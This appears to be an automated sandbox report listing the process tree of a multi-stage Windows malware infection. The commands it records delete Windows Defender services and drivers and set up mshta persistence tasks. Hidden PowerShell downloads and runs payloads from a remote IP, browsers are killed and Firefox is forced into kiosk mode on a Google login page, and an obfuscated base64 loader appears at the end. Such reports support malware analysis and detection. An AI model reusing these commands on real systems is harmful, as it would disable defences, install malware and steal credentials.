C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:2612
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f8⤵PID:2180
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"8⤵
- Launches sc.exe
PID:1400
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"8⤵
- Launches sc.exe
PID:3612
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f8⤵PID:4800
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"8⤵
- Launches sc.exe
PID:5992
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"8⤵
- Launches sc.exe
PID:5764
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f8⤵PID:3824
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"8⤵
- Launches sc.exe
PID:1316
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"8⤵
- Launches sc.exe
PID:3888
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f8⤵PID:2832
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"8⤵
- Launches sc.exe
PID:4604
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"8⤵
- Launches sc.exe
PID:1168
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f8⤵PID:1280
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"8⤵
- Launches sc.exe
PID:2820
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"8⤵
- Launches sc.exe
PID:4044
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f8⤵PID:2444
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"8⤵
- Launches sc.exe
PID:3604
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"8⤵
- Launches sc.exe
PID:2004
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f8⤵PID:4544
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"8⤵
- Launches sc.exe
PID:7200
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"8⤵
- Launches sc.exe
PID:7232
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f8⤵PID:7268
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f8⤵PID:7292
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f8⤵PID:7324
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f8⤵PID:7360
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f8⤵PID:7384
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:5116
-
-
C:\Windows\system32\sc.exesc delete ddrver8⤵
- Launches sc.exe
PID:7412
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:7584 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat4⤵
- System Location Discovery: System Language Discovery
PID:7788 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:9844
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
- System Location Discovery: System Language Discovery
PID:9872
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:11120
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵
- System Location Discovery: System Language Discovery
PID:11136
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2679785⤵
- System Location Discovery: System Language Discovery
PID:11244
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Spanish.vss5⤵
- System Location Discovery: System Language Discovery
PID:4160
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "East" Removed5⤵
- System Location Discovery: System Language Discovery
PID:11580
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com5⤵
- System Location Discovery: System Language Discovery
PID:11632
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j5⤵
- System Location Discovery: System Language Discovery
PID:11836
-
-
C:\Users\Admin\AppData\Local\Temp\267978\Exam.comExam.com j5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:12000 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12000 -s 9326⤵
- Program crash
PID:8400
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:12252
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10339220101\bb770c5446.exe"C:\Users\Admin\AppData\Local\Temp\10339220101\bb770c5446.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:8036 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn KrEgema7ynu /tr "mshta C:\Users\Admin\AppData\Local\Temp\4lEyHVJmB.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:8104 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn KrEgema7ynu /tr "mshta C:\Users\Admin\AppData\Local\Temp\4lEyHVJmB.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5728
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\4lEyHVJmB.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:8120 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'80F8SEVFBWGVS7JF51DS61OK9MWDHURZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8220 -
C:\Users\Admin\AppData\Local\Temp80F8SEVFBWGVS7JF51DS61OK9MWDHURZ.EXE"C:\Users\Admin\AppData\Local\Temp80F8SEVFBWGVS7JF51DS61OK9MWDHURZ.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:10828
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10339230121\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
PID:8720 -
C:\Windows\SysWOW64\timeout.exetimeout /t 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:8832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:8904 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8944
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:2064 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:9488 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:9524
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "GJTBImaQBb2" /tr "mshta \"C:\Temp\Bf8vLweoS.hta\"" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:10136
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\Bf8vLweoS.hta"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:10176 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:10276 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:11888
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10339390101\b17f772399.exe"C:\Users\Admin\AppData\Local\Temp\10339390101\b17f772399.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1664 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:10340
-
-
-
C:\Users\Admin\AppData\Local\Temp\10339400101\e3c37ce7e0.exe"C:\Users\Admin\AppData\Local\Temp\10339400101\e3c37ce7e0.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:12412
-
-
C:\Users\Admin\AppData\Local\Temp\10339410101\fc32507700.exe"C:\Users\Admin\AppData\Local\Temp\10339410101\fc32507700.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:8432
-
-
C:\Users\Admin\AppData\Local\Temp\10339420101\cd71e90de3.exe"C:\Users\Admin\AppData\Local\Temp\10339420101\cd71e90de3.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7988 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:8048
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2232
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:8248
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:8352
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:8660
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:8776
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:8800 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1976 -prefsLen 27100 -prefMapHandle 1980 -prefMapSize 270279 -ipcHandle 2060 -initialChannelId {085c7177-7d51-4023-b5dd-e397cde11a51} -parentPid 8800 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8800" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu6⤵PID:9196
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2464 -prefsLen 27136 -prefMapHandle 2468 -prefMapSize 270279 -ipcHandle 2476 -initialChannelId {c6503b57-f006-4e1e-b174-5a554d5720ae} -parentPid 8800 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8800" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket6⤵PID:9484
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3764 -prefsLen 25164 -prefMapHandle 3768 -prefMapSize 270279 -jsInitHandle 3772 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3804 -initialChannelId {c0a40514-01a9-4afe-91fe-db0cae1c87ef} -parentPid 8800 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8800" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab6⤵
- Checks processor information in registry
PID:10148
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3996 -prefsLen 27277 -prefMapHandle 4000 -prefMapSize 270279 -ipcHandle 4124 -initialChannelId {36827054-d4dd-4a34-a366-b0df66e9f241} -parentPid 8800 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8800" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd6⤵PID:10212
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3060 -prefsLen 34776 -prefMapHandle 2776 -prefMapSize 270279 -jsInitHandle 2780 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3036 -initialChannelId {a88e6c14-a8db-41ee-80db-dae72f680842} -parentPid 8800 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8800" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab6⤵
- Checks processor information in registry
PID:10584
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5012 -prefsLen 35013 -prefMapHandle 4996 -prefMapSize 270279 -ipcHandle 5060 -initialChannelId {11b7bb32-f306-4cdb-b9a5-47fb69ed8890} -parentPid 8800 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8800" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility6⤵
- Checks processor information in registry
PID:6132
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5292 -prefsLen 32900 -prefMapHandle 5296 -prefMapSize 270279 -jsInitHandle 5300 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5308 -initialChannelId {05104ba6-1474-4cfa-bfdd-59dc159073cf} -parentPid 8800 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8800" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab6⤵
- Checks processor information in registry
PID:2160
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5492 -prefsLen 32952 -prefMapHandle 5496 -prefMapSize 270279 -jsInitHandle 5500 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5508 -initialChannelId {a3196ff3-d62e-4ab1-9d11-b0c614e14afb} -parentPid 8800 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8800" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab6⤵
- Checks processor information in registry
PID:13272
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5684 -prefsLen 32952 -prefMapHandle 5688 -prefMapSize 270279 -jsInitHandle 5692 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5700 -initialChannelId {27b239db-a108-4935-ac1a-ebd9f5ef32dd} -parentPid 8800 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8800" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab6⤵
- Checks processor information in registry
PID:1676
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5032 -prefsLen 33002 -prefMapHandle 2876 -prefMapSize 270279 -jsInitHandle 2872 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4724 -initialChannelId {69fa042d-ae12-4bc3-89e9-a0e0ffe8f1b3} -parentPid 8800 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8800" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab6⤵PID:7632
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6368 -prefsLen 33002 -prefMapHandle 6372 -prefMapSize 270279 -jsInitHandle 6376 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6380 -initialChannelId {0ce6e0a8-951f-4760-83fa-f41c71b424ee} -parentPid 8800 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8800" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab6⤵PID:9712
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10339430101\44c4d0390b.exe"C:\Users\Admin\AppData\Local\Temp\10339430101\44c4d0390b.exe"3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:9408
-
-
C:\Users\Admin\AppData\Local\Temp\10339440101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10339440101\TbV75ZR.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1612 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat4⤵
- System Location Discovery: System Language Discovery
PID:5296 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:1160
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵PID:3364
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:1664
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵PID:1900
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2679785⤵PID:11924
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Spanish.vss5⤵PID:3548
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "East" Removed5⤵PID:12404
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com5⤵PID:12384
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j5⤵PID:12436
-
-
C:\Users\Admin\AppData\Local\Temp\267978\Exam.comExam.com j5⤵PID:12484
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12484 -s 9606⤵
- Program crash
PID:9288
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:12744
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10339450101\f73ae_003.exe"C:\Users\Admin\AppData\Local\Temp\10339450101\f73ae_003.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7380
-
-
C:\Users\Admin\AppData\Local\Temp\10339460101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10339460101\7IIl2eE.exe"3⤵PID:9668
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat4⤵PID:10372
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:12760
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵PID:12776
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:12888
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵PID:4388
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183775⤵PID:12952
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab5⤵PID:4516
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation5⤵PID:2032
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com5⤵PID:12684
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N5⤵PID:5848
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N5⤵PID:12528
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:2480
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10339470101\Q1DOy22.exe"C:\Users\Admin\AppData\Local\Temp\10339470101\Q1DOy22.exe"3⤵PID:10764
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c 67e3b7493caeb.vbs4⤵PID:11164
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e3b7493caeb.vbs"5⤵PID:11276
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dw